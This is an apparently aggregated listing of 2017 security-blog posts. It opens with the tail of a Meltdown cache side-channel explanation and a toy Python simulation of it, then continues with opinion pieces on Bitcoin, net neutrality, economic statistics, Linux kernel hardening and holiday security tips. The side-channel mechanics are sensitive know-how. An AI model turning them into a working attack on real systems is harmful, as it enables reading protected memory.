rax]` Since we already crashed up top on the first instruction, these results will never be committed to rax and rbx. However, the cache will change. 
Intel will have provisionally loaded that cache-line into the cache.At this point, it's simply a matter of stepping through all 256 cache-lines in order to find the one that's fast (already in the cache) where all the others are slow. | ||||
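
The index arithmetic in the walkthrough above (shift the secret byte left by 12, touch that slot of the probe array, then look for the one fast slot) can be mimicked with a toy model. This is a simulation under loud assumptions, not an exploit and not the paper's code: `ToyCache`, `speculative_touch`, `recover_byte`, and the `FAST`/`SLOW` latencies are all invented for illustration, and no real cache or kernel memory is involved.

```python
PAGE_SHIFT = 12      # mirrors "shl rax, 0xc": multiply the byte by 4096
NUM_VALUES = 256     # a byte has 256 possible values, one probe slot each
FAST, SLOW = 1, 100  # made-up latencies for "in cache" vs "not in cache"


def probe_offset(secret_byte):
    """Offset into the probe array selected by a byte value."""
    return secret_byte << PAGE_SHIFT


class ToyCache:
    """Hypothetical stand-in for the CPU cache: a set of cached offsets."""

    def __init__(self):
        self.cached = set()

    def flush(self):
        self.cached.clear()

    def load(self, offset):
        self.cached.add(offset)

    def access_time(self, offset):
        return FAST if offset in self.cached else SLOW


def speculative_touch(cache, secret_byte):
    """Model the side effect of "mov rbx, qword [rbx + rax]" on the cache."""
    cache.load(probe_offset(secret_byte))


def recover_byte(cache):
    """Time all 256 probe slots and return the index of the fastest one."""
    timings = [cache.access_time(probe_offset(v)) for v in range(NUM_VALUES)]
    return timings.index(min(timings))


cache = ToyCache()
cache.flush()                    # step 1: nothing from the probe array is cached
speculative_touch(cache, 0x41)   # step 2: the secret byte picks one slot
recovered = recover_byte(cache)  # step 3: the fast slot reveals the byte
print(hex(recovered))
```

The register contents are thrown away when the exception fires, but the slot index survives as a timing difference, which is the whole trick. The real attack measures access times with a cycle counter; here the "timing" is just a set lookup.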

| 2017-12-19 21:59:49 | Bitcoin: In Crypto We Trust (lien direct) | Tim Wu, who coined "net neutrality", has written an op-ed in the New York Times called "The Bitcoin Boom: In Code We Trust". He is wrong about "code".The wrong "trust"Wu builds a big manifesto about how real-world institutions can't be trusted. Certainly, this reflects the rhetoric from a vocal wing of Bitcoin fanatics, but it's not the Bitcoin manifesto.Instead, the word "trust" in the Bitcoin paper is much narrower, referring to how online merchants can't trust credit-cards (for example). When I bought school supplies for my niece when she studied in Canada, the online site wouldn't accept my U.S. credit card. They didn't trust my credit card. However, they trusted my Bitcoin, so I used that payment method instead, and succeeded in the purchase.Real-world currencies like dollars are tethered to the real-world, which means no single transaction can be trusted, because "they" (the credit-card company, the courts, etc.) may decide to reverse the transaction. The manifesto behind Bitcoin is that a transaction cannot be reversed -- and thus, can always be trusted.Deliberately confusing the micro-trust in a transaction and macro-trust in banks and governments is a sort of bait-and-switch.The wrong inspirationWu claims:"It was, after all, a carnival of human errors and misfeasance that inspired the invention of Bitcoin in 2009, namely, the financial crisis."Not true. Bitcoin did not appear fully formed out of the void, but was instead based upon a series of innovations that predate the financial crisis by a decade. Moreover, the financial crisis had little to do with "currency". The values of the dollar and other major currencies were essentially unscathed by the crisis. 
Certainly, enthusiasts looking backward like to cherry pick the financial crisis as yet one more reason why the offline world sucks, but it had little to do with Bitcoin.In crypto we trustIt's not in code that Bitcoin trusts, but in crypto. Satoshi makes that clear in one of his posts on the subject:A generation ago, multi-user time-sharing computer systems had a similar problem. Before strong encryption, users had to rely on password protection to secure their files, placing trust in the system administrator to keep their information private. Privacy could always be overridden by the admin based on his judgment call weighing the principle of privacy against other concerns, or at the behest of his superiors. Then strong encryption became available to the masses, and trust was no longer required. Data could be secured in a way that was physically impossible for others to access, no matter for what reason, no matter how good the excuse, no matter what.You don't possess Bitcoins. Instead, all the coins are on the public blockchain under your "address". What you possess is the secret, private key that matches the address. Transferring Bitcoin means using your private key to unlock your coins and transfer them to another. If you print out your private key on paper, and delete it from the computer, it can never be hacked.Trust is in this crypto operation. Trust is in your private crypto key.We don't trust the codeThe manifesto "in code we trust" has been proven wrong again and again. We don't trust computer code (software) in the cryptocurrency world.The most profound example is something known as the "DAO" on top of Ethereum, Bitcoin's major competitor. Ethereum allows "smart contracts" containing code. The quasi-religious manifesto of the DAO smart-contract is that the "code is the contract", that all the terms and conditions are specified within the smart-contract co | Uber | |||

| 2017-12-06 20:16:00 | Libertarians are against net neutrality (lien direct) | This post claims to be by a libertarian in support of net neutrality. As a libertarian, I need to debunk this. "Net neutrality" is a case of one-hand clapping, you rarely hear the competing side, and thus, that side may sound attractive. This post is about the other side, from a libertarian point of view.That post just repeats the common, and wrong, left-wing talking points. I mean, there might be a libertarian case for some broadband regulation, but this isn't it.This thing they call "net neutrality" is just left-wing politics masquerading as some sort of principle. It's no different than how people claim to be "pro-choice", yet demand forced vaccinations. Or, it's no different than how people claim to believe in "traditional marriage" even while they are on their third "traditional marriage".Properly defined, "net neutrality" means no discrimination of network traffic. But nobody wants that. A classic example is how most internet connections have faster download speeds than uploads. This discriminates against upload traffic, harming innovation in upload-centric applications like DropBox's cloud backup or BitTorrent's peer-to-peer file transfer. Yet activists never mention this, or other types of network traffic discrimination, because they no more care about "net neutrality" than Trump or Gingrich care about "traditional marriage".Instead, when people say "net neutrality", they mean "government regulation". It's the same old debate between who is the best steward of consumer interest: the free-market or government.Specifically, in the current debate, they are referring to the Obama-era FCC "Open Internet" order and reclassification of broadband under "Title II" so they can regulate it. 
Trump's FCC is putting broadband back to "Title I", which means the FCC can't regulate most of its "Open Internet" order.Don't be tricked into thinking the "Open Internet" order is anything but intensely political. The premise behind the order is the Democrats' firm belief that it's government who created the Internet, and all innovation, advances, and investment ultimately come from the government. It sees ISPs as inherently deceitful entities who will only serve their own interests, at the expense of consumers, unless the FCC protects consumers.It says so right in the order itself. It starts with the premise that broadband ISPs are evil, using illegitimate "tactics" to hurt consumers, and continues with similar language throughout the order. A good contrast to this can be seen in Tim Wu's non-political original paper in 2003 that coined the term "net neutrality". Whereas the FCC sees broadband ISPs as enemies of consumers, Wu saw them as allies. His concern was not that ISPs would do evil things, but that they would do stupid things, such as favoring short-term interests over long-term innovation (such as having faster downloads than uploads).The political depravity of the FCC's order can be seen in this comment from one of the commissio | ||||



| 2017-11-24 03:02:11 | A Thanksgiving Carol: How Those Smart Engineers at Twitter Screwed Me (lien direct) | Thanksgiving Holiday is a time for family and cheer. Well, a time for family. It's the holiday where we ask our doctor relatives to look at that weird skin growth, and for our geek relatives to fix our computers. This tale is of such computer support, and how the "smart" engineers at Twitter have ruined this for life.My mom is smart, but not a good computer user. I get my enthusiasm for science and math from my mother, and she has no problem understanding the science of computers. She keeps up when I explain Bitcoin. But she has difficulty using computers. She has this emotional, irrational belief that computers are out to get her.This makes helping her difficult. Every problem is described in terms of what the computer did to her, not what she did to her computer. It's the computer that needs to be fixed, instead of the user. When I showed her the "haveibeenpwned.com" website (part of my tips for securing computers), it showed her Tumblr password had been hacked. She swore she never created a Tumblr account -- that somebody or something must have done it for her. Except, I was there five years ago and watched her create it.Another example is how GMail is deleting her emails for no reason, corrupting them, and changing the spelling of her words. She emails the way an impatient teenager texts -- all of us in the family know the misspellings are not GMail's fault. But I can't help her with this because she keeps her GMail inbox clean, deleting all her messages, leaving no evidence behind. She has only a vague description of the problem that I can't make sense of.This last March, I tried something to resolve this. I configured her GMail to send a copy of all incoming messages to a new, duplicate account on my own email server. With evidence in hand, I would then be able to solve what's going on with her GMail. 
I'd be able to show her which steps she took, which buttons she clicked on, and what caused the weirdness she's seeing.Today, while the family was in a state of turkey-induced torpor, my mom brought up a problem with Twitter. She doesn't use Twitter, she doesn't have an account, but they keep sending tweets to her phone, about topics like Denzel Washington. And she said something about "peaches" I didn't understand.This is how the problem descriptions always start, chaotic, with mutually exclusive possibilities. If you don't use Twitter, you don't have the Twitter app installed, so how are you getting Tweets? Over much gnashing of teeth, it comes out that she's getting emails from Twitter, not tweets, about Denzel Washington -- to someone named "Peaches Graham". Naturally, she can only describe these emails, because she's already deleted them. "Ah ha!", I think. I've got the evidence! I'll just log onto my duplicate email server, and grab the copies to prove to her it was something she did.I find she is indeed receiving such emails, called "Moments", about topics trending on Twitter. They are signed with "DKIM", proving they are legitimate rather than from a hacker or spammer. The only way that can happen is if my mother signed up for Twitter, despite her protestations that she didn't.I look further back and find that there were also confirmation messages involved. Back in August, she got a typical Twit | ||||



| 2017-11-23 01:31:13 | Don Jr.: I'll bite (lien direct) | So Don Jr. tweets the following, which is an excellent troll. So I thought I'd bite. The reason is I just got through debunking Democrat claims about NetNeutrality, so it seems like a good time to balance things out and debunk Trump nonsense.The issue here is not which side is right. The issue here is whether you stand for truth, or whether you'll seize any factoid that appears to support your side, regardless of the truthfulness of it. The ACLU obviously chose falsehoods, as I documented. In the following tweet, Don Jr. does the same.It's a preview of the hyperpartisan debates you are likely to have across the dinner table tomorrow, with each side trying to outdo the other in the falsehoods they'll claim.Need something to discuss over #Thanksgiving dinner? Try this: Stock markets at all time highs; Lowest jobless claims since 73; 6 TRILLION added to economy since Election; 1.5M fewer people on food stamps; Consumer confidence through roof; Lowest Unemployment rate in 17 years #maga - Donald Trump Jr. (@DonaldJTrumpJr) November 23, 2017What we see in these numbers is a steady trend of these statistics since the Great Recession, with no evidence in the graphs showing how Trump has influenced these numbers, one way or the other.Stock markets at all time highsThis is true, but it's obviously not due to Trump. The stock markets have been steadily rising since the Great Recession. Trump has done nothing substantive to change the market trajectory. Also, he hasn't inspired the market to change its direction. To be fair to Don Jr., we've all been crediting (or blaming) presidents for changes in the stock market despite the fact they have almost no influence over it. Presidents don't run the economy, it's an inappropriate conceit. 
The most influence they've had is in harming it.Lowest jobless claims since 73Again, let's graph this: As we can see, jobless claims have been on a smooth downward trajectory since the Great Recession. It's difficult to see here how President Trump has influenced these numbers.6 Trillion added to the economyWhat he's referring to is that assets have risen in value, like the stock market, homes, gold, and even Bitcoin.But this is a well known fallacy known as Mercantilism, believing the "economy" is measure | Uber | |||

| 2017-11-22 17:44:26 | NetNeutrality vs. limiting FaceTime (lien direct) | In response to my tweets/blogs against NetNeutrality, people have asked: what about these items? In this post, I debunk the fourth item.The FCC plans to completely repeal #NetNeutrality this week. Here's the censorship of speech that actually happened without Net Neutrality rules:#SaveNetNeutrality pic.twitter.com/6R29dajt44- Christian J. (@dtxErgaOmnes) November 22, 2017The issue the fourth item addresses is how AT&T restricted the use of Apple's FaceTime on its network back in 2012. This seems a clear NetNeutrality issue.But here's the thing: the FCC allowed these restrictions, despite the FCC's "Open Internet" order forbidding such things. In other words, despite the graphic's claims it "happened without net neutrality rules", the opposite is true, it happened with net neutrality rules.The FCC explains why they allowed it in their own case study on the matter. The short version is this: AT&T's network couldn't handle the traffic, so it was appropriate to restrict it until some time in the future (the LTE rollout) when it could. The issue wasn't that AT&T was restricting FaceTime in favor of its own video-calling service (it didn't have one), but it was instead an issue of "bandwidth management".When Apple released FaceTime, they themselves restricted its use to WiFi, preventing its use on cell phone networks. That's because Apple recognized mobile networks couldn't handle it.When Apple flipped the switch and allowed its use on mobile networks, because mobile networks had gotten faster, they clearly said "carrier restrictions may apply". In other words, it said "carriers may restrict FaceTime with our blessing if they can't handle the load".When Tim Wu wrote his paper defining "NetNeutrality" in 2003, he anticipated just this scenario. 
He wrote:"The goal of bandwidth management is, at a general level, aligned with network neutrality."He doesn't give "bandwidth management" a completely free pass. He mentions the issue frequently in his paper with a less favorable description, such as here:Similarly, while managing bandwidth is a laudable goal, its achievement through restricting certain application types is an unfortunate solution. The result is obviously a selective disadvantage for certain application markets. The less restrictive means is, as above, the technological management of bandwidth. Application-restrictions should, at best, be a stopgap solution to the problem of competing bandwidth demands. And that's what AT&T's FaceTime limiting was: an unfortunate stopgap solution until LTE was more fully deployed, which is fully allowed under Tim Wu's principle of NetNeutrality.So the ACLU's claim above is fully debunked: such things did happen even with NetNeutrality rules in place, and should happen. | ||||

| 2017-11-22 16:51:22 | NetNeutrality vs. Verizon censoring Naral (lien direct) | In response to my anti-NetNeutrality blogs/tweets, people ask what about this? In this post, I address the second question.The FCC plans to completely repeal #NetNeutrality this week. Here's the censorship of speech that actually happened without Net Neutrality rules:#SaveNetNeutrality pic.twitter.com/6R29dajt44- Christian J. (@dtxErgaOmnes) November 22, 2017Firstly, it's not a NetNeutrality issue (which applies only to the Internet), but an issue with text-messages. In other words, it's something that will continue to happen even with NetNeutrality rules. People relate this to NetNeutrality as an analogy, not because it actually is such an issue.Secondly, it's an edge/content issue, not a transit issue. The details in this case are that Verizon provides a program for sending bulk messages to its customers from the edge of the network. Verizon isn't censoring text messages in transit, but from the edge. You can send a text message to your friend on the Verizon network, and it won't be censored. Thus the analogy is incorrect -- the correct analogy would be with content providers like Twitter and Facebook, not ISPs like Comcast.Like all cell phone vendors, Verizon polices this content, canceling accounts that abuse the system, like spammers. We all agree such censorship is a good thing, and that such censorship of content providers is not remotely a NetNeutrality issue. Content providers do this not because they disapprove of the content of spam so much as because of the distaste their customers have for spam.Content providers being political, rather than neutral to politics, is indeed worrisome. It's not a NetNeutrality issue per se, but it is a general "neutrality" issue. 
We free-speech activists want all content providers (Twitter, Facebook, Verizon mass-texting programs) to be free of political censorship -- though we don't want government to mandate such neutrality.But even here, Verizon may be off the hook. They appear not to be censoring one political view over another, but the controversial/unsavory way Naral expresses its views. Presumably, Verizon would be okay with less controversial political content.In other words, as Verizon expresses its principles, it wants to block content that drives away customers, but is otherwise neutral to the content. While this may unfairly target controversial political content, it's at least basically neutral.So in conclusion, while activists portray this as a NetNeutrality issue, it isn't. It's not even close. | ||||

| 2017-11-22 16:43:08 | NetNeutrality vs. AT&T censoring Pearl Jam (lien direct) | So in response to my anti-netneutrality tweets/blogs, Jose Pagliery asks "what about this?"The FCC plans to completely repeal #NetNeutrality this week. Here's the censorship of speech that actually happened without Net Neutrality rules:#SaveNetNeutrality pic.twitter.com/6R29dajt44- Christian J. (@dtxErgaOmnes) November 22, 2017Let's pick the first one. You can read about the details by Googling "AT&T Pearl Jam".First of all, this obviously isn't a Net Neutrality case. The case isn't about AT&T acting as an ISP transiting network traffic. Instead, this was about AT&T being a content provider, through their "Blue Room" subsidiary, whose content traveled across other ISPs. Such things will continue to happen regardless of the most stringent enforcement of NetNeutrality rules, since the FCC doesn't regulate content providers.Second of all, it wasn't AT&T who censored the traffic. It wasn't their Blue Room subsidiary who censored the traffic. It was a third party company they hired to bleep things like swear words and nipple slips. You are blaming AT&T for a decision by a third party that went against AT&T's wishes. It was an accident, not AT&T policy.Thirdly, and this is the funny bit, Tim Wu, the guy who defined the term "net neutrality", recently wrote an op-ed claiming that while ISPs shouldn't censor traffic, content providers should. In other words, he argues that companies like AT&T's Blue Room should censor political content.What activists like ACLU say about NetNeutrality has as little relationship to the truth as Trump's tweets. Both pick "facts" that agree with them only so long as you don't look into them. | ||||

| 2017-11-22 15:19:41 | The FCC has never defended Net Neutrality (lien direct) | This op-ed by a "net neutrality expert" claims the FCC has always defended "net neutrality". It's garbage. This is wrong on its face. It imagines that decades ago the FCC enshrined some plaque on the wall stating principles that subsequent FCC commissioners have diligently followed. The opposite is true. FCC commissioners are a chaotic bunch, with different interests, influenced (i.e. "lobbied" or "bribed") by different telecommunications/Internet companies. Rather than following a principle, their Internet regulatory actions have been ad hoc and arbitrary -- for decades. Sure, you can cherry-pick some of those regulatory actions as fitting a "net neutrality" narrative, but most actions don't fit that narrative, and there have been gross net neutrality violations that the FCC has ignored. There are gross violations going on right now that the FCC is allowing. Most egregious is the "zero-rating" of video traffic on T-Mobile. This is a clear violation of the principles of net neutrality, yet the FCC is allowing it -- despite official "net neutrality" rules in place. The op-ed above claims that "this [net neutrality] principle was built into the architecture of the Internet". The opposite is true. Traffic discrimination was built into the architecture since the beginning. If you don't believe me, read RFC 791 and the "precedence" field. More concretely, from the beginning of the Internet as we know it (the 1990s), CDNs (content delivery networks) have provided a fast-lane for customers willing to pay for it. These CDNs are so important that the Internet wouldn't work without them. I just traced the route of my CNN live stream. It comes from a server 5 miles away, instead of CNN's headquarters 2500 miles away. 
That server is located inside Comcast's network, because CNN pays Comcast a lot of money to get a fast-lane to Comcast's customers. The reason these egregious net neutrality violations exist is that they are in the interests of customers. Moving content closer to customers helps. Re-prioritizing (and charging less for) high-bandwidth video over cell networks helps customers. You might say it's okay that the FCC bends net neutrality rules when it benefits consumers, but that's garbage. Net neutrality claims these principles are sacred and should never be violated. Obviously, that's not true -- they should be violated when it benefits consumers. This means what net neutrality is really saying is that ISPs can't be trusted to always act to benefit consumers, and therefore need government oversight. Well, if that's your principle, then what you are really saying is that you are a left-winger, not that you believe in net neutrality. Anyway, my point is that the above op-ed cherry-picks a few data points in order to build a narrative that the FCC has always regulated net neutrality. A larger view is that the FCC has never defended this on principle, and is indeed not defending it right now, even with "net neutrality" rules officially in place. | ||||
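For readers who want to see the RFC 791 "precedence" field mentioned above, here is a minimal sketch in Python. It assumes a raw IPv4 header is already in hand as bytes; the function name `ip_precedence` and the sample header values are made up for illustration. Per RFC 791, precedence is the top three bits of the Type of Service byte, which is the second byte of the header.

```python
import struct

# Precedence names as listed in RFC 791 (Type of Service, bits 0-2).
PRECEDENCE_NAMES = {
    0: "Routine",
    1: "Priority",
    2: "Immediate",
    3: "Flash",
    4: "Flash Override",
    5: "CRITIC/ECP",
    6: "Internetwork Control",
    7: "Network Control",
}


def ip_precedence(header: bytes) -> int:
    """Return the 3-bit precedence value from a raw IPv4 header."""
    if len(header) < 20:
        raise ValueError("an IPv4 header is at least 20 bytes")
    if header[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    tos = header[1]   # Type of Service byte
    return tos >> 5   # top three bits are the precedence


# Hypothetical header for illustration: version 4, IHL 5, ToS 0xA0,
# total length 20, TTL 64, protocol 6 (TCP), checksum left at zero.
sample = struct.pack(
    "!BBHHHBBH4s4s",
    0x45, 0xA0, 20, 0, 0, 64, 6, 0,
    bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]),
)
level = ip_precedence(sample)
print(level, PRECEDENCE_NAMES[level])
```

The point of the sketch is only that the original IPv4 header reserved bits for marking some packets as more important than others.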

| 2017-11-21 16:38:17 | Your Holiday Cybersecurity Guide (lien direct) | Many of us are visiting parents/relatives this Thanksgiving/Christmas, and will have an opportunity to help them with cybersecurity issues. I thought I'd write up a quick guide of the most important things. 1. Stop them from reusing passwords. By far the biggest threat to average people is that they re-use the same password across many websites, so that when one website gets hacked, all their accounts get hacked. To demonstrate the problem, go to haveibeenpwned.com and enter the email address of your relatives. This will show them a number of sites where their password has already been stolen, like LinkedIn, Adobe, etc. That should convince them of the severity of the problem. They don't need a separate password for every site. For the majority of websites, you don't care whether you get hacked. Use a common password for all the meaningless sites. You only need unique passwords for important accounts, like email, Facebook, and Twitter. Write down passwords and store them in a safe place. Sure, it's a common joke that people in offices write passwords on Post-It notes stuck on their monitors or under their keyboards. This is a common security mistake, but that's only because the office environment is widely accessible. Your home isn't, and there are plenty of places to store written passwords securely, such as in a home safe. Even if it's just a desk drawer, such passwords are safe from hackers, because they aren't on a computer. Write them down, with pen and paper. Don't put them in a MyPasswords.doc, because when a hacker breaks in, they'll easily find that document and easily hack your accounts. You might help them out with getting a password manager, or two-factor authentication (2FA). Good 2FA like YubiKey will stop a lot of phishing threats. But this is difficult technology to learn, and of course, you'll be on the hook for support issues, such as when they lose the device. 
Thus, while 2FA is best, I'm only recommending pen-and-paper to store passwords. (AccessNow has a guide, though I think YubiKey/U2F keys for Facebook and GMail are the best). 2. Lock their phone (passcode, fingerprint, faceprint). You'll lose your phone at some point. It has the keys to all your accounts, like email and so on. With your email, phone thieves can then reset passwords on all your other accounts. Thus, it's incredibly important to lock the phone. Apple has made this especially easy with fingerprints (and now faceprints), so there's little excuse not to lock the phone. Note that Apple iPhones are the most secure. I give my mother my old iPhones so that they will have something secure. My mom demonstrates a problem you'll have with the older generation: she doesn't reliably have her phone with her, and charged. She's the opposite of my dad, who is religiously enslaved to his phone. Even a small change to make her lock her phone means it'll be even more likely she won't have it with her when you need to call her. 3. WiFi (WPA). Make sure their home WiFi is WPA encrypted. It probably already is, but it's worthwhile checking. The password should be written down on the same piece of paper as all the other passwords. This is important. My parents just moved, Comcast installed a WiFi access point for them, and they promptly lost the piece of paper. When I wanted to debug something on their network today, they didn't know the password, and couldn't find the paper. Get that password written down in a place it won't get lost! Discourage them from extra security features like "SSID hiding" and/or "MAC address filtering". | ||||

| 2017-11-20 01:00:27 | Why Linus is right (as usual) (lien direct) | People are debating this email from Linus Torvalds (maintainer of the Linux kernel). It has strong language, like: Some security people have scoffed at me when I say that security problems are primarily "just bugs". Those security people are f*cking morons. Because honestly, the kind of security person who doesn't accept that security problems are primarily just bugs, I don't want to work with. I thought I'd explain why Linus is right. Linus has an unwritten manifesto of how the Linux kernel should be maintained. It's not written down in one place; instead we are supposed to reverse engineer it from his scathing emails, where he calls people morons for not understanding it. This is one such scathing email. The rules he's expressing here are: Large changes to the kernel should happen in small iterative steps, each one thoroughly debugged. Minor security concerns aren't major emergencies; they don't allow bypassing the rules more than any other bug/feature. Last year, some security "hardening" code was added to the kernel to prevent a class of buffer-overflow/out-of-bounds issues. This code didn't address any particular 0day vulnerability, but was designed to prevent a class of future potential exploits from being exploited. This is reasonable. This code had bugs, but that's no sin. All code has bugs. The sin, from Linus's point of view, is that when an overflow/out-of-bounds access was detected, the code would kill the user-mode process or kernel. Linus thinks it should have only generated warnings, and let the offending code continue to run. Of course, that would in theory make the change of little benefit, because it would no longer prevent 0days from being exploited. But warnings would only be temporary, the first step. There are likely to be bugs in the large code change, and it would probably uncover bugs in other code. 
While bounds-checking is a security issue, its first implementation will always find existing code having bounds bugs. Killing things made these bugs worse, causing catastrophic failures in the latest kernel that didn't exist before. Warnings, however, would have equally highlighted the bugs, but without causing catastrophic failures. My car runs multiple copies of Linux -- such catastrophic failures would risk my life. Only after a year, when the bugs have been fixed, would the default behavior of the code be changed to kill buggy code, thus preventing exploitation. In other words, large changes to the kernel should happen in small, manageable steps. This hardening hasn't existed for 25 years of the Linux kernel, so there's no emergency requiring it be added immediately rather than conservatively, no reason to bypass Linus's development processes. There's no reason it couldn't have been warnings for a year while working out problems, followed by killing buggy code later. Linus was correct here. No vuln has appeared in the last year that this code would've stopped, so the fact that it killed processes/kernels rather than generated warnings was unnecessary. Conversely, because it killed things, bugs in the kernel code were costly, and required emergency patches. Despite his unreasonable tone, Linus is a hugely reasonable person. He's not trying to stop changes to the kernel. He's not trying to stop security improvements. He's not even trying to stop processes from getting killed. That's not why people are moronic. Instead, they are moronic for not understanding that large changes need to be made conservatively, and security issues are no more important than any other | ||||
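The warn-first, kill-later rollout described above can be sketched in a few lines of Python. This is only an illustration of the idea, not the kernel's actual hardening code: `checked_copy`, `HardeningViolation`, and the `mode` parameter are hypothetical names, and a `bytearray` stands in for kernel memory where a fixed-size field is followed by other data.

```python
import warnings


class HardeningViolation(Exception):
    """Raised in 'kill' mode; stands in for killing the process or kernel."""


def checked_copy(backing: bytearray, field_size: int, data: bytes,
                 mode: str = "warn") -> None:
    """Copy data into a field occupying the first field_size bytes of backing.

    'warn' reports an overrun but lets the copy proceed, as it did before
    the hardening existed. 'kill' refuses the copy by raising.
    """
    if mode not in ("warn", "kill"):
        raise ValueError("mode must be 'warn' or 'kill'")
    if len(data) > len(backing):
        raise ValueError("data does not fit in the backing buffer at all")
    if len(data) > field_size:
        message = f"copy of {len(data)} bytes overruns {field_size}-byte field"
        if mode == "kill":
            raise HardeningViolation(message)
        warnings.warn(message, RuntimeWarning)
    # Same-length slice assignment, so the buffer size never changes.
    backing[:len(data)] = data


# Phase one: ship with warnings, so existing bounds bugs get reported
# without taking anything down.
buf = bytearray(16)
checked_copy(buf, 8, b"A" * 10, mode="warn")

# Phase two, after the reported bugs are fixed: flip the default to 'kill'.
try:
    checked_copy(bytearray(16), 8, b"A" * 10, mode="kill")
except HardeningViolation as exc:
    print("killed:", exc)
```

In warn mode the buggy caller behaves exactly as it did before, only noisier, which is why that mode is safe to ship first.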



| 2017-11-17 17:55:29 | How to read newspapers (lien direct) | News articles don't contain the information you think. Instead, they are written according to a formula, and that formula is as much about distorting/hiding information as it is about revealing it. A good example is the following. I claimed hate-crimes aren't increasing. The tweet below tries to disprove me, by citing a news article that claims the opposite: Ugh turns out you're wrong! I know you let quality data inform your opinions, and hope the FBI is a sufficiently credible source for you https://t.co/SVwaLilF9B - Rune Sørensen (@runesoerensen) November 14, 2017. But the data behind this article tells a very different story than the words. Every November, the FBI releases its hate-crime statistics for the previous year. They've been doing this every year for a long time. When they do so, various news organizations grab the data and write a quick story around it. By "story" I mean a story. Raw numbers don't interest people, so the writer instead has to wrap them in a narrative that does interest people. That's what the writer has done in the above story, leading with the fact that hate crimes have increased. But is this increase meaningful? What do the numbers actually say? To answer this, I went to the FBI's website, the source of this data, grabbed the numbers for the last 20 years, and graphed them in Excel, producing the following graph: As you can see, there is no significant rise in hate-crimes. Indeed, the latest numbers are about 20% below the average for the last two decades, despite a tiny increase in the last couple years. Statistically/scientifically, there is no change, but you'll never read that in a news article, because it's boring and readers won't pay attention. You'll only get a "news story" that weaves a narrative that interests the reader. So back to the original tweet exchange. 
The person used the news story to disprove my claim, but going to the underlying data, it only supports my claim that the hate-crimes are going down, not up -- the small increases of the past couple years are insignificant to the larger decreases of the last two decades. So that's the point of this post: news stories are deceptive. You have to double-check the data they are based upon, and pay less attention to the narrative they weave, and even less attention to the title designed to grab your attention. Anyway, as a side-note, I'd like to apologize for being human. The snark/sarcasm of the tweet above gives me extra pleasure in proving them wrong :). |

Guideline | |||